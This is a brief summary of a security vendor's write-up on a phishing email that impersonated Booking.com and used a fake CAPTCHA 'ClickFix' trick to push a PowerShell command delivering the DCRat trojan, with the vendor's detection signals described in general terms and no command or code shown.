Detecting an email-based ClickFix attack that delivers DCRat malware payload

Sublime's Attack Spotlight series highlights a sophisticated email threat involving a malware attack delivered through a fake email thread about an apartment rental. The attacker used social engineering tactics by fabricating a scenario with a sick colleague to prompt the recipient to engage with a malicious link masquerading as a Booking.com "Accommodation Rules" page. This link led to a deceptive CAPTCHA that surreptitiously copied a malicious PowerShell command to the user's clipboard, which, if executed, would download and run a DCRat malware payload. The DCRat malware, a well-documented .Net-based remote access trojan, is capable of executing shell commands, keylogging, and stealing files, among other functions. Sublime's AI-powered detection engine successfully flagged and prevented the attack by identifying key signals such as newly registered domains, brand impersonation, and social engineering tactics. The series emphasizes the importance of adaptive email security platforms that utilize AI and machine learning to detect and prevent evolving threats.